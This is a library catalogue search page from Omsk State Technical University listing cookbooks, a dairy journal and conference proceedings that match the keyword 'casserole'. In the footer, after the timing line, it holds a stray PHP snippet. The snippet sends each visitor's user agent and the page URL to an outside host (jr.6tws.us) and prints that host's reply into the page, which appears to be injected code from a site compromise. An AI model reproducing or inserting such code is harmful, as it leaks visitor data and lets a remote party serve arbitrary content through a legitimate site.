Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

172 пользователей


Зарегистрированных: 12 

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна

Тушнолобова Анастасия Сергеевна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЗАПЕКАНКА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 10
1. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
2. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
3. 
Рыбные блюда [Текст] / дар. В. А. Козлова, 1996. - 415 с.
Держатели документа (Информация об экземплярах) 
4. 
Молочная промышленность. - Журнал, 2010г. № 7
Оглавление 
  • Радаева, И. А. Ведущие ученые отрасли: Богданов Вячеслав Михайлович / И. А. Радаева. - с.80
  • К юбилею ведущего маслодела России. - с.74-75
  • Дунченко, Н. И. Научно-исследовательская работа - одна из основных составляющих подготовки магистров / Н. И. Дунченко, Л. В. Калинина, А. В. Ионов. - с.72-73
  • Пасько, О. В. Социальная значимость и экономическая эффективность технологий ферментированных продуктов / О. В. Пасько. - с.70-71
  • Быстрозамороженная творожная запеканка. - с.69
  • Степанов, К. М. Якутские национальные кисломолочные продукты нового поколения / К. М. Степанов, В. Т. Васильева. - с.68
  • Глаголева, Л. Э. Формы связи влаги в продуктах на творожной основе / Л. Э. Глаголева, Н. Ю. Черноусова, Л. С. Просвирина. - с.66-67
  • Количество в кефире полисахарида, производимого молочнокислыми бактериями. - с.64-65
  • Ермолаев, В. А. Вакуумное концентрирование молочно-белковых продуктов / В. А. Ермолаев. - с.62-63
  • Красноштанова, А. А. Молекулярное распределение белков при ультраконцентрировании сыворотки / А. А. Красноштанова, В. Г. Попов, О. В. Рытченкова. - с.60-61
  • Гиринович, О. А. Семинар "ЭФКО": фокус на творожную продукцию / О. А. Гиринович. - с.58-59
  • Смирнова, И. А. Молочно-белковый концентрат / И. А. Смирнова, В. Н. Печерина. - с.57
  • Мельникова, Е. И. Имитатор молочного жира для синбиотических продуктов / Е. И. Мельникова, Е. Б. Станиславская, Н. А. Подгорный. - с.55-56
  • Куликова, И. К. Кисломолочный напиток смешанного брожения / И. К. Куликова, И. А. Евдокимов, М. А. Гашева. - с.53-54
  • Тагатозосодержащий подсластитель. - с.52
  • Кравченко, Э. Ф. Белковые структурообразователи - загустители / Э. Ф. Кравченко, В. П. Захлестных. - с.51
  • Евелева, В. В. Добавки для йогурта / В. В. Евелева, А. Л. Рублев, Л. А. Забодалова. - с.48-50
  • Соколенко, Г. Г. Сывороточный квас с экстрактом амаранта / Г. Г. Соколенко, К. К. Полянский, Т. В. Вострикова. - с.46-47
  • Электродиализные установки для переработки молочной сыворотки. - с.45
  • Бурцев, Д. Г. Концентрат "КПС - лакт" / Д. Г. Бурцев, А. Д. Лодыгин. - с.44
  • Бурцев, Д. Г. Бифидогенный концентрат "Лактобел" / Д. Г. Бурцев, В. Н. Чернобаев. - с.43
  • Дудникова, О. А. Липидно-белковый концентрат / О. А. Дудникова, А. Д. Лодыгин, А. Г. Храмцов. - с.42-43
  • Храмцов, А. Г. Модернизация молочного дела: продвижение инновационных приоритетов / А. Г. Храмцов. - с.38-41
  • Комментарии к Типовой технологической инструкции по стандарту на молоко и сливки сгущенные с сахаром. - с.34-36
  • Пасько, О. В. Активизация роста и защиты культур с пробиотическими свойствами / О. В. Пасько. - с.31-32
  • Арсеньева, Т. П. К чему приводит лактазная недостаточность / Т. П. Арсеньева. - с.28-30
  • Хамагаева, И. С. Внеклкеточные метаболиты, синтезируемые пробиотическими микроорганизмами / И. С. Хамагаева, С. Б. Тумунова, Н. А. Замбалова. - с.27
  • Влияние лактитола на сквашивание и антагонистическую активность молочнокислых микроорганизмов. - с.24-26
  • Производители "Бифилайф" - лидеры молочной промышленности. - с.23
  • Ефимочкина, Н. Р. Возбудители пищевых зоонозов / Н. Р. Ефимочкина. - с.20-22
  • В помощь микробиологу. - с.18
  • Миллер, М. "Прозрачное молоко" на предприятии TNUVA / М. Миллер, М. Полыновская. - с.16-17
  • Имидж розничных сетей России глазами покупателей. - с.13-14
  • Быковская, Г. В. Как можно стабилизировать цены на молоко / Г. В. Быковская. - с.9-12
  • Потенциальные возможности и перспективы развития рынка молока и молочных продуктов в России. - с.6-8
Держатели документа (Информация об экземплярах) 
5. 
Наука XXI века: тенденции и перспективы [Текст] / ред. А. И. Барановский, 2015. - 198 с.
Оглавление 
  • Блинов, О. А. Опыт развития агротуристической деятельности в районах Омской области / О. А. Блинов, Д. С. Нардин, С. А. Нардина. - с.3-7
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - ТУРИЗМ, АГРОТУРИЗМ
  • Блинов, О. А. Организация финансового менеджмента на предприятиях агропромышленного комплекса / О. А. Блинов, А. В. Гаврилова. - с.7-12
    Кл. слова: МЕНЕДЖМЕНТ ФИНАНСОВЫЙ, КОМПЛЕКС АГРОПРОМЫШЛЕННЫЙ
  • Боровских, Н. В. Структура и особенности функционирования рынка молока / Н. В. Боровских, С. В. Боровских. - с.12-16
    Кл. слова: РЫНОК МОЛОКА, МОЛОКО - СПРОС, МОЛОКО - ПРЕДЛОЖЕНИЕ
  • Герасимова, Н. О. Особенности развития продовольственного рынка как элемента современной экономической системы / Н. О. Герасимова, Л. А. Кочемайкина. - с.17-
    Кл. слова: СИСТЕМА ЭКОНОМИЧЕСКАЯ, РЫНОК ПРОДОВОЛЬСТВЕННЫЙ, РЕГУЛИРОВАНИЕ ПРОДОВОЛЬСТВЕННОГО РЫНКА
  • Глебова, Н. М. Определение конкурентных преимуществ вуза с учетом предпочтений потребителей / Н. М. Глебова, Е. Е. Грязнова. - с.21-27
    Кл. слова: УСЛУГА ОБРАЗОВАТЕЛЬНАЯ, КОММУНИКАЦИИ МАРКЕТИНГОВЫЕ, ВУЗ - КОНКУРЕНЦИЯ
  • Губанова, Е. В. Исследование регионального рынка труда на примере Калужской области / Е. В. Губанова. - с.28-34
    Кл. слова: РЫНОК ТРУДА РЕГИОНАЛЬНЫЙ, БЕЗРАБОТИЦА, КАЛУЖСКАЯ ОБЛАСТЬ
  • Ермакова, Н. С. К вопросу о нематериальном стимулировании персонала / Н. С. Ермакова, О. А. Якуб, Е. А. Обвинцева. - с.34-42
    Кл. слова: СТИМУЛИРОВАНИЕ ПЕРСОНАЛА, СТИМУЛИРОВАНИЕ НЕМАТЕРИАЛЬНОЕ, ПЕРСОНАЛ
  • Иванова, Н. Г. Повышение активности контрольных мероприятий по учету расчетов с персоналом по оплате труда в бюджетных организациях / Н. Г. Иванова, С. А. Мороз, Т. А. Головина. - с.42-48
    Кл. слова: ОПЛАТА ТРУДА - БЮДЖЕТНАЯ СФЕРА, АУТСОРСИНГ, КО-СОРСИНГ
  • Иккерт, А. В. Совершенствование учета основных средств на примере ЗАО "Первомайское" Омского района Омской области / А. В. Иккерт, Ю. И. Новиков. - с.50-53
    Кл. слова: СРЕДСТВА ОСНОВНЫЕ, ЗАО ПЕРВОМАЙСКОЕ, ФОНД ОСНОВНОЙ
  • Казначеева, Е. М. Система штрафов и доплат как элемент воздействия на результаты работы персонала организации / Е. М. Казначеева. - с.186-192
    Кл. слова: ПЕРСОНАЛ ОРГАНИЗАЦИИ, САНКЦИИ ШТРАФНЫЕ, ДОПЛАТА
  • Кислицын, В. Г. Учет загрузки производственных мощностей как способ снизить роль неявных факторов в статистическом анализе источников / В. Г. Кислицын. - с.57-63
    Кл. слова: МОЩНОСТЬ ПРОИЗВОДСТВЕННАЯ, АНАЛИЗ СТАТИСТИЧЕСКИЙ, УЧЕТ ПРОИЗВОДСТВЕННЫХ МОЩНОСТЕЙ
  • Кислицына, Т. Ф. Электронный документооборот - высокотехнологичный и прогрессивный подход к существенному повышению эффективности работы организации / Т. Ф. Кислицына, Л. В. Лукашевич. - с.64-73
    Кл. слова: ДОКУМЕНТООБОРОТ ЭЛЕКТРОННЫЙ, ПРОДУКТ ПРОГРАММНЫЙ, ЭФФЕКТИВНОСТЬ ПРОИЗВОДСТВА
  • Лалова, Е. Ю. Человеческий капитал и производительность труда работников как объект управления персоналом / Е. Ю. Лалова, Л. Н. Иванова. - с.73-78
    Кл. слова: КАПИТАЛ ЧЕЛОВЕЧЕСКИЙ, ПРОИЗВОДИТЕЛЬНОСТЬ ТРУДА, УПРАВЛЕНИЕ ПЕРСОНАЛОМ
  • Литвякова, Ю. С. Организация аудиторской проверки основных средств на примере ООО "Солярное" Черлакского района Омской области / Ю. С. Литвякова. - с.78-82
    Кл. слова: ПРОВЕРКА АУДИТОРСКАЯ, СРЕДСТВА ОСНОВНЫЕ
  • Литвякова, Ю. С. Организация бухгалтерского учета основных средств на примере ООО "Солярное" Черлакского района Омской области / Ю. С. Литвякова. - с.78-82
    Кл. слова: УЧЕТ БУХГАЛТЕРСКИЙ, СРЕДСТВА ОСНОВНЫЕ
  • Мамонтов, С. А. Обобщенные результаты исследования потребительского рынка города Омска / С. А. Мамонтов, Ю. В. Шляпина
    Кл. слова: РЫНОК ПОТРЕБИТЕЛЬСКИЙ, ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ, ОМСК - ТОРГОВЛЯ
  • Маслова, Л. И. О некоторых аспектах экономических отношений в сфере высшего профессионального образования Кыргызстана / Л. И. Маслова. - с.98-102
    Кл. слова: КЫРГЫЗСТАН - ОБРАЗОВАНИЕ
  • Новиков, Ю. И. Повышение конкурентоспособности зернового производства в системе обеспечения продовольственной безопасности / Ю. И. Новиков. - с.102-105
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ, ПРОИЗВОДСТВО ЗЕРНОВОЕ
  • Новиков, Ю. И. Учет кредитов и займов в ТОО "Совет-СК", Республика Казахстан / Ю. И. Новиков, В. А. Штрикер. - с.106-109
    Кл. слова: ФОНДОЕМКОСТЬ, ЗАЙМ, КРЕДИТ
  • Рожина, Е. Ю. Современные концепции оценки социально-экономической эффективности деятельности рыночных субъектов / Е. Ю. Рожина, Т. Б. Дороболюк, С. И. Ускова. - с.110-119
  • Турдалы, Н. О. Актуальные вопросы конкурентоспособности регионов Республики Казахстан / Н. О. Турдалы, А. Н. Турдалы, Ж. Н. Турдалы. - с.119-132
    Кл. слова: КАЗАХСТАН - РЕГИОНЫ, КАЗАХСТАН - ЭКОНОМИКА
  • Турдалы, Н. О. Инфраструктура поддержки малого предпринимательства в Республике Казахстан / Н. О. Турдалы, А. Е. Шахарова. - с.132-144
    Кл. слова: КАЗАХСТАН - ПРЕДПРИНИМАТЕЛЬСТВО
  • Чуракова, Т. Б. Анализ и перспективы развития потребительского рынка города Омска в 2015 году / Т. Б. Чуракова, В. А. Пинко. - с.145-150
    Кл. слова: РЫНОК ПОТРЕБИТЕЛЬСКИЙ, ОМСК - БИЗНЕС
  • Шагланов, А. Н. Инвестиционный климат в России: проблемы и перспективы / А. Н. Шагланов. - с.150-155
    Кл. слова: ИНВЕСТИЦИИ - РОССИЯ, ДЕЯТЕЛЬНОСТЬ ИНВЕСТИЦИОННАЯ
  • Шеремета, С. В. Процесс управления активами кредитной организации / С. В. Шеремета, И. Н. Шадрина. - с.155-160
    Кл. слова: ОРГАНИЗАЦИЯ КРЕДИТНАЯ, АКТИВ БАНКА, УПРАВЛЕНИЕ АКТИВАМИ
  • Эрлих, А. Е. Особенности взаимодействия предприятий общественного питания / А. Е. Эрлих, Н. В. Бобкова, Е. Н. Клок. - с.160-164
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ, ВЗАИМОДЕЙСТВИЕ ПРЕДПРИЯТИЙ
  • Беспалова, Т. А. Современные методы дезинфекции при казеозном лимфадените / Т. А. Беспалова, О. А. Приступа, А. В. Шадрин. - с.165-170
    Кл. слова: ДЕЗИНФЕКЦИЯ, ЛИМФАДЕНИТ, ЗАБОЛЕВАНИЕ ИНФЕКЦИОННОЕ
  • Бураковская, Н. В. Инновационные технологии в организации школьного питания / Н. В. Бураковская. - с.170-172
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ, РАЦИОН СБАЛАНСИРОВАННЫЙ, ТЕХНОЛОГИИ ИННОВАЦИОННЫЕ
  • Германская, Л. Г. Молокосодержащие продукты как системообразующий фактор здорового питания / Л. Г. Германская, Н. А. Бенгардт, Л. М. Завгородняя. - с.172-175
    Кл. слова: ПРОДУКТЫ МОЛОКОСОДЕРЖАЩИЕ, ПИТАНИЕ ЗДОРОВОЕ
  • Есипова, М. С. Инновационные технологии в производстве творожных продуктов / М. С. Есипова, М. О. Индычий. - с.176-181
    Кл. слова: ТВОРОГ, ПРОДУКТ ТВОРОЖНЫЙ, ТЕХНОЛОГИИ ИННОВАЦИОННЫЕ
  • Каня, И. П. Салатные застолья / И. П. Каня. - с.181-188
    Кл. слова: САЛАТЫ, СОВМЕСТИМОСТЬ ПРОДУКТОВ, МАЙОНЕЗ
  • Лемешева, Е. Р. Анализ пищевой ценности овощной запеканки с творогом для организации питания детей школьного возраста / Е. Р. Лемешева. - с.188-193
    Кл. слова: ЗАПЕКАНКА ОВОЩНАЯ, ПИТАНИЕ ШКОЛЬНИКОВ, ТВОРОГ
  • Шадрин, М. А. Культура потребления пищевых продуктов / М. А. Шадрин [и др.]
    Другие авторы: Тарасов Р. М., Жданеева Н. П., Галкина С. Л.
    Кл. слова: КУЛЬТУРА ПИТАНИЯ
Держатели документа (Информация об экземплярах) 
6. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
7. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
8. 
Научный потенциал молодежи: состояние, проблемы, перспективы исследований [Текст] / ред. А. И. Барановский, 2014. - 323 с.
Оглавление 
  • Свиридова, А. В. Административная классическая школа управления / А. В. Свиридова. - с.10-33
    Кл. слова: ШКОЛА УПРАВЛЕНИЯ КЛАССИЧЕСКАЯ, ШКОЛА АДМИНИСТРАТИВНОГО УПРАВЛЕНИЯ, ВОСТОЧНЫЙ ЭКСПРЕСС БАНК
  • Крапивина, Л. С. Стимулирование сбыта мороженого среди молодежи / Л. С. Крапивина, К. С. Сухинина. - с.34-64
    Кл. слова: ПРОДАЖА МОРОЖЕНОГО, РЕКЛАМА - МОЛОДЕЖЬ
  • Шивякова, К. В. Совершенствование системы организации рабочих мест в ОАО "Называевский" / К. В. Шивякова. - с.65-114
    Кл. слова: МЕСТО РАБОЧЕЕ
  • Кравченко, К. И. Продвижение бренда на рынке услуг связи с использованием приемов партизанского маркетинга / К. И. Кравченко. - с.115-145
    Кл. слова: УСЛУГА СВЯЗИ, РЫНОК УСЛУГ, ПРОДВИЖЕНИЕ БРЕНДА
  • Женченко, И. В. Эффективность использования рабочего времени руководителя / И. В. Женченко. - с.146-177
    Кл. слова: ВРЕМЯ РАБОЧЕЕ, РУКОВОДИТЕЛЬ ОРГАНИЗАЦИИ
  • Максимов, Д. В. Потребительское кредитование / Д. В. Максимов. - с.177-206
    Кл. слова: КРЕДИТОВАНИЕ ПОТРЕБИТЕЛЬСКОЕ
  • Лемишева, Е. Р. Разработка технологии овощной запеканки с творогом для питания детей школьного возраста / Е. Р. Лемишева. - с.208-251
    Кл. слова: ЗАПЕКАНКА ОВОЩНАЯ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Горохова, Е. А. Электронная торговля / Е. А. Горохова. - с.252-272
    Кл. слова: ТОРГОВЛЯ ЭЛЕКТРОННАЯ
  • Свиридова, А. В. Применение информационных технологий при решении задач / А. В. Свиридова. - с.273-303
    Кл. слова: ТЕХНОЛОГИИ ИНФОРМАЦИОННЫЕ, РЕШЕНИЕ ЗАДАЧ, ЗАДАЧА
  • Гаврилова, Ю. А. Экологические аспекты использования энергосберегающих ламп / Ю. А. Гаврилова, А. А. Бродникова. - с.304-322
    Кл. слова: ЛАМПА ЭНЕРГОСБЕРЕГАЮЩАЯ
Держатели документа (Информация об экземплярах) 
9. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
10. 
Киселева, Вера Борисовна. Детская кухня [Текст] : Кн. для матерей о приготовлении пищи детям / В. Б. Киселева; В. С. Вайль, 1958. - 175 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3079 - 14.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.90 с.14 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;